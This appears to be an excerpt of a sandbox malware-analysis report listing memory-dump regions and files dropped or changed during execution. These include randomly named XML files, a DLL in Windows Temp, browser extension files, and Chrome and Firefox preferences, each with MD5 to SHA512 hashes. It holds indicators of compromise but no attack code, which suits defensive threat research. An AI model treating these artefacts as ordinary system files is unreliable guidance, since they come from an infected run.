memory/864-66-0x0000000004A80000-0x0000000004DD7000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 139701ea6ec9d1fe423e7c691a45ca41
SHA1 84169504f0096d347ba3accf92b818af05964852
SHA256 5677ac82d6603cedf1b7836aaba1771ff3c9d1553261790e762d853342f2fbac
SHA512 384f522fa3e9d6fc79a3a94fe998d995505c5d6df6fe180356478a571d55b94bedc6410d3afcd7a0bbdc7e019ecb8eb7beff419b0561f63aa49584db0eccf895

memory/864-69-0x0000000073350000-0x0000000073B01000-memory.dmp

memory/4032-80-0x000001A1FC540000-0x000001A1FC562000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d6342910a480d30ccafff897943bc031
SHA1 59b9e2a701b73a0fa1c06a0cb631be90b944e2db
SHA256 e673856141302edf24b7543ae7d3f1b5e098f60ba74cfb1a899516615c450748
SHA512 1f6f66fb2e3d54b921c10bb812d289477de6e8f6a2cbfa931888c23113065a43c2e71ea08f75d366e0a077a28fcf00c933e75d29fbf8af026cb251ffcc9145d0

memory/4032-83-0x000001A1E4210000-0x000001A1E4220000-memory.dmp

memory/4032-82-0x000001A1E4210000-0x000001A1E4220000-memory.dmp

memory/4032-81-0x00007FF923120000-0x00007FF923BE2000-memory.dmp

memory/4032-87-0x00007FF923120000-0x00007FF923BE2000-memory.dmp

memory/3016-88-0x0000000000020000-0x00000000006DA000-memory.dmp

memory/4588-94-0x00000000007E0000-0x0000000000E9A000-memory.dmp

memory/3016-93-0x0000000000020000-0x00000000006DA000-memory.dmp

memory/4588-95-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/4588-106-0x0000000002440000-0x00000000024C5000-memory.dmp

memory/4352-108-0x0000000073380000-0x0000000073B31000-memory.dmp

memory/4352-109-0x00000000018F0000-0x0000000001900000-memory.dmp

memory/4352-119-0x0000000004C20000-0x0000000004F77000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ca222869372262badc663f5086509ff
SHA1 75689ab45426b82a2404c93761820e66d7ec2f16
SHA256 f7f0e7d2ec26ac262498b8888b0b5510bdee30a2cd492406a88d46d6df946c72
SHA512 fe11e34d02ddc7cc40ebc8201592033f88567ee265510e93578edfd009f4ade529ce58a2215254e38daba5fbe3d5c7f2ace43656bb4b91c3bdd00e05679a64bb

memory/4352-139-0x00000000057A0000-0x00000000057EC000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 d3115d9161c8563786499a5128eb59b8
SHA1 a186af6779e14d42c3b2064abc86e358317cc361
SHA256 ff4c65a256784513892266b6ab315d7d76cb2a2d5841cd716d22ed9ebc0298db
SHA512 10dc29dda3449ad7e5a2b38743e92d149660fd5c6b0e0c6572aaba330a28c3ec3c4b22603d9d9bccfbad333dfc6e0ffdeb896ba14a047a41c3273a52dcfc5512

memory/4352-153-0x0000000073380000-0x0000000073B31000-memory.dmp

memory/4588-165-0x0000000002D50000-0x0000000002DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 076dee9a0e7f704f50435a860ef61ffc
SHA1 71bfb3f8905b3c81698ce82e5fe37097dd9b9d7c
SHA256 153089f4c44b875138ca8d7bbfe3fc6817173c18afa9c44391aad496957c29de
SHA512 f494671a802d512087f3c814f581e986f884d83605f642fbf9493d3ca39ce3005436bd25990085dd4e2e2b3a506765f3ef453f8e4a50b686c4cea14b9208ccc6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\qBvbbKpBU\xQnaRLd.xml

MD5 224188146046285145e47f6a27a6e375
SHA1 0da41e1af4677c6dc206e33d962cfa6e14ba535f
SHA256 f1713da310855055824c6ae21ed3655df6f4d39eb8874966f098707bc5ce94cf
SHA512 6e2ef453b6205413155094318e0b9216f921ff56ed563949611e1e8205970b1669bfcb9a76a0fd5ee5988851e780804c332edd24f6fa37527e706beeafe04fad

C:\Program Files (x86)\fZHZowTYSgfU2\vZajwhU.xml

MD5 61b1cff08e5448f2749132b518106538
SHA1 acaf5ccc4500801702122e3e338363f130350a26
SHA256 d57c094454d90432cf1798251bb6abc693fba91e26fc4c52bd9d5a8ebd808391
SHA512 53966b7fbc3a7feb2a7aeade911e5a562c3493b2dffb317e7fdb2e2ddc9ce838fd1279ba28f4656aeef41700a154f4791466dab60182313d65c55cf8a577b420

C:\ProgramData\nxeoDZreGracWIVB\QOFtfPe.xml

MD5 1daf7858d66ad38494f70ae207bc47bc
SHA1 3698a70d0a32d185e120d13e098d6ac3edc98c29
SHA256 61b6623b80e73d6194624870c4a585e1e5b89833bb605e9d3ba03eab96766027
SHA512 6614d7a74d12c33b1c908539f913b461e6180943548e5b4780cf0cd590532d699d89322724896fb6fe94b5a6f2ee794b1ca17a1e00a3a6fd7262d946a999d715

C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\LlqHhEU.xml

MD5 cacad263becdf0e04629c31f5b4475e2
SHA1 f29a233e11195b5c347a5d858cde9059a2ae3f46
SHA256 510394b3b61107f1abd4fff2fb2c1717dee90fee6f3ec5b1c1c2fdfc55fd65a5
SHA512 fd3924ef3d39f5d41335cfe1fd888909f3fa5f46cfe5136183b4f8ae3051b2408422f50ea30161726b4c37664d46ae6a9cbc9acc707bc0b07113222686669cb5

C:\Program Files (x86)\epUZFeichsCPC\eYzHLaL.xml

MD5 3b4270df66d6eb4c8b59cff909e61836
SHA1 1dab675683e9d1b7984a1c7d5a290d1bde772e7e
SHA256 6e3b686d2dfc9d02c2cf409bcce90720eb2f5c04c0a79277ca4f9b8b67b843dc
SHA512 38a9f56b0f9477f7082b95b2cec7fb01803b5b9e0612180043e247f3b8b067283f41d542714e2f14538bec6ab7dc8391678e8303efa834b78d5572b5fe09126e

C:\Windows\Temp\JHEwijpMlSQrgvQB\gjmcrxLt\TEFcZVt.dll

MD5 44f3948cb32c3b8df1fca5ef30116aa0
SHA1 c674b72e1e1058d0e29d555abc09d40f0c7c8a0c
SHA256 12cd48a7e59081b04ad77863bdfc946ecaeccede9368f6410e05c80ee526a0fe
SHA512 09d5de6251c88e853132bc8455f2da4d4922a9059778c5103652da3420cd7f98de983f6e3e9ebbe201bd520ac6dbff4cc95b7f01cf6ea335b05671f99649b5b0

memory/4588-497-0x00000000035D0000-0x000000000365A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d4663c2ae63573ddce91ee0819881949
SHA1 47d1721bb62b429df3a85ee6b3052d7eaba33a08
SHA256 aea1a32f518489a0603a5f516ca5d61c4451d87493b1c9ab99bff588aa816065
SHA512 93e1f63c00eb3cdfa9c49f0ac9afd85bc39807819f8301438c15405cbd73fec67afe4a35723def3ec5e645ef2f7a17e146260e1abd8c0c4566614777492fae3b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8ypl8oso.default-release\prefs.js

MD5 2987d6a5ea543ee0df5c9b2d810b3147
SHA1 49917b247a8eae061926d428ffbb22531ea75dd3
SHA256 7c7c4a5316a4d437b53af2e05854563768b60eebc694f8a18c59c5908af72658
SHA512 d7b85df73c258adc8b62b734697dc3f2a2a2243e84b37fa0dd2d314b282a16a15dcec0fc48aedc6751d59f6cbbff2a8167fb565ecc26480948fdde18d86d03a1

memory/4588-512-0x00000000037B0000-0x0000000003892000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 95cc7b3bf21ac583d48cfaf1504840af
SHA1 d1f775032c2f07548871dd0ad6333080d70ee54a
SHA256 056049a1ef425bd061895d26260be3d1fddce16201138005185367cbff823d52
SHA512 57845ce09ebf153ea7e7b02d1984f1bb9c98af11ad625051046ed9cb0dd11b734c30cb80529c4b6bf407791fd241b404554540096d1b3455947c1bf197232a66

memory/1948-511-0x0000000001230000-0x0000000005D7C000-memory.dmp

memory/2828-570-0x0000000000AA0000-0x000000000115A000-memory.dmp

memory/4588-571-0x00000000007E0000-0x0000000000E9A000-memory.dmp